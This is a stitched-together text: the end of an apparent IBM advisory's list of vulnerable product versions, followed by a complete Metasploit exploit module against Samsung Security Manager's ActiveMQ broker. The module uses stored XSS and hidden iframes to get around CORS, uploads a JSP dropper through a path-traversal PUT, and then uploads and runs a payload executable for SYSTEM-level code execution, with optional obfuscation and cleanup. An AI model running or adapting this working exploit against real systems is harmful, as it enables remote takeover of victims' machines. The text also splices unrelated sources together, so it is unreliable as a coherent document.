IBM Java SDK 6.0.13.1 ~~Technolog
IBM Java SDK 6.0.13.0 ~~Technolog
IBM Java SDK 6.0.12.0 ~~Technolog
IBM Java SDK 6.0.11.0 ~~Technolog
IBM Java SDK 6.0.10.1 ~~Technolog
IBM Java SDK 6.0.10.0 ~~Technolog
IBM Java SDK 6.0.1.0 ~~Technology
IBM Java SDK 6.0.1 SR6
IBM Java SDK 6.0.1 SR5-FP2
IBM Java SDK 6.0.1 SR5
IBM Java SDK 6.0.1 SR4
IBM Java SDK 6.0.1 SR3
IBM Java SDK 6.0.0.0 ~~Technology
IBM Java SDK 6.0 SR16-FP3
IBM Java SDK 6 SR16-FP5
IBM Java SDK 6 SR16-FP4
IBM Java SDK 6 SR16-FP3
IBM Java SDK 6 SR16-FP2
IBM Java SDK 6 SR16 FP20
IBM Java SDK 6 SR16
IBM Java SDK 6 SR14
IBM Java SDK 6 SR13-FP2
IBM Java SDK 6 SR13-FP1
IBM Java SDK 6 SR13
IBM Java SDK 6 SR12
IBM Java SDK 6 SR11
IBM Java SDK 6 SR10
IBM Java SDK 6 SR 16 FP 7
IBM Java SDK 6 SR 16 FP 5
IBM Java SDK 6 SR 16 FP 15
IBM Java SDK 6
IBM Java SDK 5
IBM Java 7 SR5
IBM InfoSphere Streams 4.1.1.0
IBM InfoSphere Streams 4.0.1.1
IBM InfoSphere Streams 3.2.1.4
IBM InfoSphere Streams 3.1.0.8
IBM InfoSphere Streams 3.0.0.6
IBM InfoSphere Streams 2.0.0.4
IBM InfoSphere Streams 1.2.1.0
IBM Image Construction and Composition Tool 2.3.2.0
IBM Image Construction and Composition Tool 2.3.1.0
IBM ILOG Optimization Decision Manager Enterprise 3.7.0.2
IBM ILOG Optimization Decision Manager Enterprise 3.6
IBM ILOG Optimization Decision Manager Enterprise 3.5
IBM i 7.3
IBM i 7.2
IBM i 7.1
IBM i 6.1
IBM Explorer for z/OS 3.0
IBM eDiscovery Analyzer 2.2.2
IBM eDiscovery Analyzer 2.2.1
IBM eDiscovery Analyzer 2.2
IBM Decision Optimization Center 3.8.0.2
IBM Decision Optimization Center 3.8
IBM CPLEX Optimization Studio 12.6.3
IBM CPLEX Optimization Studio 12.6.1
IBM CPLEX Optimization Studio 12.5.1
IBM CPLEX Optimization Studio 12.6.0.1
IBM CPLEX Optimization Studio 12.6
IBM CPLEX Optimization Studio 12.5.0.1
IBM CPLEX Optimization Studio 12.5
IBM CPLEX Optimization Studio 12.4.0.1
IBM CPLEX Optimization Studio 12.4
IBM CPLEX Enterprise Server 12.6.3
IBM CPLEX Enterprise Server 12.6.1
IBM CPLEX Enterprise Server 12.5.1
IBM CPLEX Enterprise Server 12.6.0.1
IBM CPLEX Enterprise Server 12.6
IBM CPLEX Enterprise Server 12.5.0.1
IBM CPLEX Enterprise Server 12.5
IBM CPLEX Enterprise Server 12.4.0.1
IBM CPLEX Enterprise Server 12.4
IBM Cloud Manager with Openstack 4.3
IBM Cloud Manager with Openstack 4.2
IBM Cloud Manager with Openstack 4.1
IBM Cloud Manager with Openstack 4.3.0.6
IBM Cloud Manager with Openstack 4.3.0.4
IBM Cloud Manager with Openstack 4.3.0.3
IBM Cloud Manager with Openstack 4.3.0.2
IBM Cloud Manager with Openstack 4.3.0.1
IBM Cloud Manager with Openstack 4.2.0.3 Interim Fix
IBM Cloud Manager with Openstack 4.2.0.2
IBM Cloud Manager with Openstack 4.2.0.1
IBM Cloud Manager with Openstack 4.1.0.5 Interim Fix
IBM Cloud Manager with Openstack 4.1.0.4
IBM Cloud Manager with Openstack 4.1.0.3
IBM Cloud Manager with Openstack 4.1.0.2
IBM Cloud Manager with Openstack 4.1.0.1
IBM AIX 7.2
IBM AIX 7.1
IBM AIX 6.1
IBM AIX 5.3

Not Vulnerable:
IBM Security Access Manager for Web 8.0.1.4
IBM Security Access Manager for Mobile 8.0.1.4
IBM Security Access Manager 9.0.1.0
IBM Notes Standard Client 9.0.1 FP6
IBM Java SDK 8 SR 3
IBM Java SDK 8 SR 2 FP 14
IBM Java SDK 7R1 SR 3 FP 40
IBM Java SDK 7 SR 9 FP 40
IBM Java SDK 7 SR 9 FP 32
IBM Java SDK 6R1 SR 8 FP 25
IBM Java SDK 6R1 SR 8 FP 21
IBM Java SDK 6 SR 16 FP 25
IBM Java SDK 6 SR 16 FP 22



##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Samsung Security Manager 1.5 ActiveMQ Broker Service PUT Method Remote Code Execution",
      'Description'    => %q{
        This is an exploit against Samsung Security Manager that bypasses the patch in
        CVE-2015-3435 by exploiting the vulnerability against the client side. This exploit has
        been tested successfully against IE, FireFox and Chrome by abusing a GET request XSS to
        bypass CORS and reach the vulnerable PUT. Finally, a traversal is used in the PUT request
        to upload the code just where we want it and gain Remote Code Execution as SYSTEM.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me <mr_me[at]offensive-security.com>', # vuln + module
        ],
      'References'     =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          # tested on 1.32, 1.4 & 1.5
          [ 'Samsung Security Manager 1.32, 1.4 & 1.5 Universal', {} ],
        ],
      'DisclosureDate' => "Aug 05 2016",
      'DefaultTarget'  => 0))
    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
      ], self.class)
  end

  # this is because String.fromCharCode has a max of 65535 func args
  # thanks to sinn3r for his help with the Array->String conversion
  # returns one or two comma-separated byte lists, split at the 65535-argument boundary
  def encode_js(string)
    i = 0
    encoded_0 = []
    encoded_1 = []
    string.each_byte do |c|
      if i > 65534
        encoded_1 << c
      else
        encoded_0 << c
      end
      i += 1
    end
    if i > 65534
      return encoded_0 * ",", encoded_1 * ","
    else
      return encoded_0 * ","
    end
  end

  # tested on Firefox v46.0.1 (latest)
  # tested on Chrome v50.0.2661.102 (latest release)
  # tested on IE v11.0.9600.18314 (latest)
  def on_request_uri(cli, request)

    js_name = rand_text_alpha(rand(10)+5) + '.js'

    payload_url = "http://"
    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/" + js_name

    # we deliver the JavaScript code that does the work for us
    if (request.uri.match(/.js/))
      return if ((p = regenerate_payload(cli)) == nil)

      # don't exploit again otherwise we get a zillion shells
      return if session_created? or @exploited

      jsp_name = rand_text_alpha(rand(10)+5) + '.jsp'
      exe_name = rand_text_alpha(rand(10)+5) + '.exe'

      # clean just the jsp, because the exe dropper will be in use
      register_files_for_cleanup("../../webapps/admin/#{jsp_name}")

      # our jsp upload, ensuring native code execution
      jsp = %Q|<%@ page import="java.io.*" %>
<%
ByteArrayOutputStream buf = new ByteArrayOutputStream();
BufferedReader reader = request.getReader();
int tmp;
while ((tmp = reader.read()) != -1) buf.write(tmp);
FileOutputStream fostream = new FileOutputStream("#{exe_name}");
buf.writeTo(fostream);
fostream.close();
Runtime.getRuntime().exec("#{exe_name}");
%>|

      # encode the payloads
      encoded_exe = encode_js(generate_payload_exe(code: payload.encoded))
      encoded_jsp = encode_js(jsp)

      # targets
      jsp_uri = "http://localhost:8161/fileserver/..%5c%5cadmin%5c%5c#{jsp_name}"
      upload_uri = "http://localhost:8161/admin/#{jsp_name}"

      # this code does the PUT, then uploads/exec native code and then cleans the XSS out :->
      js_content = %Q|

    function do_put(uri, file_data) {
      var file_size = file_data.length;
      var xhr = new XMLHttpRequest();
      xhr.open("PUT", uri, true);
      var body = file_data;
      xhr.send(body);
      return true;
    }

    function do_upload(uri, file_data) {
      var file_size = file_data.length;
      var xhr = new XMLHttpRequest();
      xhr.open("POST", uri, true);
      var body = file_data;

      // latest ff doesn't have sendAsBinary(), so we redefine it
      if(!xhr.sendAsBinary){
        xhr.sendAsBinary = function(datastr) {
          function byteValue(x) {
            return x.charCodeAt(0) & 0xff;
          }
          var ords = Array.prototype.map.call(datastr, byteValue);
          var ui8a = new Uint8Array(ords);
          this.send(ui8a.buffer);
        }
      }
      xhr.sendAsBinary(body);
      return true;
    }

    function bye_bye_xss(uri) {
      var xhr = new XMLHttpRequest();
      xhr.open('GET', uri.replace(/\\+/g,"%2b"), true);
      xhr.send();
    }

    function clean_up() {
      var xhr = new XMLHttpRequest();
      xhr.onreadystatechange = function() {
        if (xhr.readyState == XMLHttpRequest.DONE) {
          var els = xhr.responseXML.getElementsByTagName("a");
          for (var i = 0, l = els.length; i < l; i++) {
            var el = els[i];
            if (el.href.search("http://localhost:8161/admin/deleteDestination.action") == 0) {
              bye_bye_xss(el.href);
            }
          }
        }
      }
      xhr.open('GET', 'http://localhost:8161/admin/queues.jsp', true);
      xhr.responseType = "document"; // so that we can parse the response as a document
      xhr.send(null);
    }

    function exploit() {
      do_upload('#{upload_uri}', String.fromCharCode(#{encoded_exe[0]}) + String.fromCharCode(#{encoded_exe[1]}));
      clean_up();
    }

    function start() {
      do_put('#{jsp_uri}', String.fromCharCode(#{encoded_jsp}));
      setTimeout(exploit(), 2000); // timing is important
    }
    start();
|

      if datastore['OBFUSCATE']
        js_content = ::Rex::Exploitation::JSObfu.new(js_content)
        js_content.obfuscate
      end

      print_status("Sending javascript...")
      @exploited = true
      send_response_html(cli, js_content, 'Content-Type' => 'application/javascript' )
      return
    end

    # note: the HTML stage below carries no JavaScript of its own; obfuscation
    # (OBFUSCATE) is applied only to the .js stage served above

    iframe_injection = ""
    # done so that we can ensure that we hit our payload, since iframes load very fast, we need a few
    (1..20).step(1) do |n|
      iframe_injection << "<iframe src=\"http://localhost:8161/admin/queueGraph.jsp\" width=\"0\" height=\"0\"></iframe>"
    end

    # the stored XSS endpoint
    target = "http://localhost:8161/admin/browse.jsp?JMSDestination="

    # we use XSS to execute JavaScript code in local context to avoid CORS
    xss_injection = "\"+eval(\"var a=document.createElement('script');a.type='text/javascript';"
    xss_injection << "a.src='#{payload_url}';document.body.appendChild(a)\")+\""
    target << Rex::Text.uri_encode(xss_injection)

    # we can bypass Access-Control-Allow-Origin (CORS) in all browsers using iframe since it makes a GET request
    # and the response is received in the page (even though we can't access it due to SOP) which then fires the XSS
    html_content = %Q|
    <html>
    <body>
    <iframe src="#{target}" width="0" height="0"></iframe>
    #{iframe_injection}
    </body>
    </html>
    |
    print_status("Sending exploit...")
    send_response_html(cli, html_content)
    handler(cli)
  end
end

